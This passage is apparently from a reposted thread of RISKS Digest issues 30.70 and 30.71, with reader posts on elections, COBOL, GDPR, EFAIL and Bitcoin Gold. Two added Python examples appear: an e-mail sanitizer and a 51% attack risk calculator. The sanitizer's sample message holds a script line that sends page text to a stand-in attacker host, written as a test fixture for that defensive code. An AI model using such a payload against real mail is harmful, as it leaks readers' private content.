    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
counted and would be flushed away as soon as they cast their ballot. Some
angrily accused me of trying to take away their precious right to vote, for
which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something. In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered

        ADD GIN TO VERMOUTH GIVING MARTINI;

    there aren't a lot of other options beyond

        COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that I whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).
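
    [The following is an added example, not code from the original post
    and not from the EFAIL authors. It demonstrates the mitigation the
    post describes: reduce every message to plain text before it reaches
    the inbox, drop script and style content, and report any external
    resource an HTML part would have made the client fetch (remote image
    and link references are the channel the EFAIL direct-exfiltration
    variant relied on). The sample message, the addresses in it, and the
    list of attributes treated as remote-content triggers are constructed
    for illustration.]

```python
"""Strip HTML from an e-mail message and report remote-content references.

Added example; not code from the original post or from the EFAIL paper.
The sample message below is constructed, and REMOTE_ATTRS is an
illustrative (not exhaustive) list of attributes that cause a client to
fetch a remote resource.
"""
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# (tag, attribute) pairs whose value makes an HTML renderer contact a server.
REMOTE_ATTRS = {
    ("img", "src"), ("link", "href"), ("iframe", "src"),
    ("source", "src"), ("video", "src"), ("audio", "src"),
}
BLOCK_TAGS = {"br", "p", "div", "tr", "li"}


class HtmlToText(HTMLParser):
    """Render HTML to text, dropping script/style bodies and noting remote refs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.text = []
        self.remote = []
        self._skip = 0  # nesting depth inside <script> / <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        for name, value in attrs:
            # Only http(s) URLs reach a remote server; cid: and data: do not.
            if (tag, name) in REMOTE_ATTRS and value \
                    and urlparse(value).scheme in ("http", "https"):
                self.remote.append(value)
        if tag in BLOCK_TAGS:
            self.text.append("\n")

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def html_to_text(html):
    """Return (plain_text, [remote URLs]) for one HTML document."""
    parser = HtmlToText()
    parser.feed(html)
    parser.close()
    return "".join(parser.text).strip(), parser.remote


def sanitize_message(raw):
    """Return (text_body, [remote URLs]) for a raw RFC 822 message.

    A text/plain part is preferred when present; HTML parts are only
    converted when no plain alternative exists, but every HTML part is
    scanned for remote references regardless.
    """
    msg = message_from_string(raw)
    plain, converted, remote = [], [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset, "replace")
        ctype = part.get_content_type()
        if ctype == "text/plain":
            plain.append(body.strip())
        elif ctype == "text/html":
            text, refs = html_to_text(body)
            converted.append(text)
            remote.extend(refs)
        # Other parts (attachments) are not rendered as message text.
    return "\n".join(plain or converted), remote


# Constructed sample: a multipart/alternative message whose HTML part
# carries a script and a tracking image pointing at an external host.
SAMPLE_MESSAGE = """\
From: alice@example.invalid
To: bob@example.invalid
Subject: quarterly figures
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Figures attached. Call me.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Figures attached. <b>Call me.</b></p>
<script>document.location='http://evil.invalid/'+document.body.innerText</script>
<img src="http://evil.invalid/track.gif?u=bob">
<img src="cid:logo">
</body></html>
--b1--
"""

if __name__ == "__main__":
    text, refs = sanitize_message(SAMPLE_MESSAGE)
    print(text)
    print("remote references:", refs)
```

    A mail filter built on this logic would deliver only the returned
    text and treat a non-empty list of remote references as a reason to
    quarantine or at least flag the message, since each such URL is a
    request the reader's client would otherwise have made to a third
    party before anyone looked at the mail.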

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're supposed to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPAA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. The medical insurance industry should take note and enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
     
  5. LakeGator

    Risks Digest 30.71

    RISKS List Owner

    Jun 5, 2018 3:56 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 5 May 2018 Volume 30 : Issue 71

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Microsoft to acquire GitHub for $7.5 billion (Lauren Weinstein)
    Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)
    Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)
    Google to remove "secure" indicator from HTTPS pages on Chrome (Keith Medcalf,
    Gene Wirchenko, John Levine)
    "How your web browser tells you when it's safe" (Gregg Keizer)
    "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)
    FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)
    Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)
    How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)
    Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)
    YouTube stars' fury over algorithm tests (BBC.com)
    Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later (Fortune)
    Amazon's Echo privacy flub has big implications for IT (Evan Schuman)
    "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)
    License Plate Risks (Jeremy Ardley)
    "Jira bug exposed private server keys at major companies, researcher finds"
    (Zack Whittaker)
    Google Started a Political Sh*tstorm Because of Its Over-Reliance on
    Wikipedia (Motherboard)
    Signs of sophisticated cellphone spying found near White House, U.S.
    officials say (WaPo)
    Massive Visa Outage Shows the Fragility of Global Payments (WiReD)
    How can criminals manipulate cryptocurrency markets?
    (The Conversation)
    Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds of User
    Email Addresses (Gizmodo)
    Commentary: GDPR Misses the Point (Fortune)
    GDPR, Privacy, and CISSPforum vs "Community" (Rob Slade)
    German spy agency can keep tabs on Internet hubs: court (Phys)
    Trendism and cognitive stagnation (John Ohno)
    Re: Securing Elections (Amos Shapir)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 4 Jun 2018 10:34:09 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Microsoft to acquire GitHub for $7.5 billion

    via NNSquad
    Microsoft Corp. on Monday announced it has reached an agreement to acquire
    GitHub, the world's leading software development platform where more than
    28 million developers learn, share and collaborate to create the
    future. Together, the two companies will empower developers to achieve
    more at every stage of the development lifecycle, accelerate enterprise
    use of GitHub, and bring Microsoft's developer tools and services to new
    audiences.

    All GitHub users forthwith will be required to run Windows 10 or subsequent
    Microsoft operating systems with all privacy options disabled, manage their
    code only by voice via Cortana, and install the new Microsoft Clippy 2018!
    Microsoft Office Assistant on all of their devices. Microsoft will now scan
    all GitHub materials for patent infringement and turn violators over to
    local authorities for arrest.

    ------------------------------

    Date: Sun, 27 May 2018 14:40:13 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)

    NNSquad
    Bitcoin backlash as ‘miners’ suck up electricity, stress power grids in Central Washington

    But it's not simply the scale of requests that is perplexing utility
    staff. Many would-be miners have no understanding of how large power
    purchases work. In one case this winter, miners from China landed their
    private jet at the local airport, drove a rental car to the visitor center
    at the Rocky Reach Dam, just north of Wenatchee, and, according to Chelan
    County PUD officials, politely asked to see the "dam master because we
    want to buy some electricity." Bitcoin fever has created other,
    smaller-scale problems for the utility. Three times a week, on average,
    utility crews in Chelan County discover unpermitted home miners running
    computer servers far too large for the electrical grids of residential
    neighborhoods. In one instance last year, the transformer outside a
    bootleg miner's home overheated and touched off a grass fire, Chelan
    County PUD officials say.

    Just cut these cryptocurrency mining parasites off. Knock them off the
    grid. If they can generate their own power safely, fine. Otherwise, to hell
    with them.

    ------------------------------

    Date: May 26, 2018 at 8:10:52 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)

    Joon Ian Wong, QZ, 24 May 2018
    Every cryptocurrency’s nightmare scenario is happening to Bitcoin Gold

    Bitcoin Gold is a fork, or spin-off, of the original cryptocurrency,
    bitcoin. It shares much of the same code and works in a similar way to
    bitcoin, with Bitcoin Gold miners contributing computational power to
    process new transactions. That also means it faces the same vulnerabilities
    as bitcoin, but without the protections that come from the large, dispersed
    group of people and organizations whose computers are powering the bitcoin
    blockchain.

    In recent days the nightmare scenario for any cryptocurrency is playing out
    for Bitcoin Gold, as an attacker has taken control of its blockchain and
    proceeded to defraud cryptocurrency exchanges. All the Bitcoin Gold in
    circulation is valued at $786 million, according to data provider
    Coinmarketcap. Blockchains are designed to be decentralized but when an
    individual or group acting in concert controls the majority of a
    blockchain's processing power, they can tamper with transactions and pave
    the way for fraud. This is known as a 51% attack.

    The possibility of a 51% attack has been one of the concerns institutions
    such as banks and tech companies have had over the years about using the
    blockchain for transactions; some have worried that the Chinese government
    could at some point endeavor to do that, ordering all of the Chinese bitcoin
    miners to act in concert. It's unlikely for bitcoin, but for smaller
    cryptocurrencies, 51% attacks are a concern, one dramatized on a recent
    episode of HBO's series Silicon Valley.

    Cryptocurrency miners commit their computer processing power--or hash
    power--to adding new transactions to a coin's blockchain. They are rewarded
    in units of the coin in return. The idea is that these incentives create
    competition among miners to add more hash power to the chain. The more hash
    power is added, the better the chances of winning a reward.

    So what's a 51% attack? It's when a single miner controls more than half of
    the hash power on a particular blockchain. When this happens, that miner can
    mess with transactions in a bunch of ways, including spending coins
    twice. This is the *double-spending problem*, a puzzle surrounding digital
    money that has vexed computer scientists for years -- and which was solved
    by bitcoin. But the solution only holds if no single miner controls the
    majority of the hash power on a chain.

    Bitcoin Gold has been experiencing double-spending attacks for at least a
    week, according to forum posts by Bitcoin Gold director of communications
    Edward Iskra. Someone has taken control of more than half of Bitcoin Gold's
    hash rate and is double-spending coins. Since an attacker must spend coins
    in his or her possession, and can't conjure up new coins, the attack is
    somewhat limited.

    What's happening now, according to Iskra, is that exchanges that
    automatically accept large deposits are being targeted. The fraudster
    deposits Bitcoin Gold into an account at an exchange, where coins are
    traded. Once the exchange credits the Bitcoin Gold to the attacker's
    account, the attacker trades those coins for another cryptocurrency and
    withdraws it. The attacker can repeatedly make deposits of the same Bitcoin
    Gold it deposited in the first exchange and profit in this way.

    A bunch of other cryptocurrencies have been attacked in similar ways
    recently. Something called Verge has been hit twice in the last two months,
    leading to $2.7 million being stolen. The exotic-sounding coins Monacoin and
    Electroneum have also suffered from 51% attacks not too long ago.

    ------------------------------
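    The arithmetic behind the last sentence of the preceding item, as an added
    example (not code from the article or from Bitcoin Gold): section 11 of the
    bitcoin whitepaper gives the probability that a miner holding share q of the
    hash power catches up from z blocks behind, which is what an exchange's
    "wait for N confirmations before crediting a deposit" policy relies on. The
    attacker shares and loss thresholds used here are assumed inputs.

```python
import math


def attacker_success_probability(q: float, z: int) -> float:
    """Probability that a miner holding fraction q of the total hash power
    eventually builds a longer chain than the honest one, starting z blocks
    behind (the calculation in section 11 of the bitcoin whitepaper).

    Once q >= 0.5 the attacker always catches up, however many confirmations
    the exchange waited for: that is the 51% attack described above."""
    if not 0.0 <= q <= 1.0:
        raise ValueError("q must be a fraction of the total hash power")
    if z < 0:
        raise ValueError("z must be a non-negative confirmation count")
    p = 1.0 - q                      # honest share of the hash power
    if q >= p:
        return 1.0                   # majority: catch-up is certain
    lam = z * q / p                  # expected attacker blocks while the honest
                                     # chain mined the z confirmations
    never_catches_up = 0.0
    for k in range(z + 1):
        # Poisson probability the attacker mined k blocks in that time, times
        # the probability of never closing the remaining (z - k) block gap.
        poisson = math.exp(-lam) * lam ** k / math.factorial(k)
        never_catches_up += poisson * (1.0 - (q / p) ** (z - k))
    return 1.0 - never_catches_up


def confirmations_needed(q: float, max_risk: float):
    """Smallest confirmation depth z at which the catch-up probability is at
    most max_risk. Returns None when no depth helps (q >= 0.5)."""
    if q >= 0.5:
        return None
    z = 0
    while attacker_success_probability(q, z) > max_risk:
        z += 1
    return z


def deposit_policy(deposit_value: float, attacker_share: float,
                   tolerable_loss: float):
    """Confirmations an exchange should require before crediting a deposit so
    that the expected loss (probability of reversal times deposit value) stays
    at or below tolerable_loss. Assumes, as in the article, that the attacker's
    gain is the credited deposit itself. None means: do not auto-credit."""
    return confirmations_needed(attacker_share, tolerable_loss / deposit_value)


if __name__ == "__main__":
    # Assumed attacker shares; the last column is the article's scenario.
    shares = (0.10, 0.30, 0.45, 0.51)
    print("z   " + "".join(f"q={q:<10.2f}" for q in shares))
    for z in (0, 1, 2, 6, 10, 25):
        row = "".join(f"{attacker_success_probability(q, z):<12.7f}"
                      for q in shares)
        print(f"{z:<4d}{row}")
    # A constructed exchange policy: credit a 1,000-coin deposit automatically
    # only when the expected loss is at most 1 coin.
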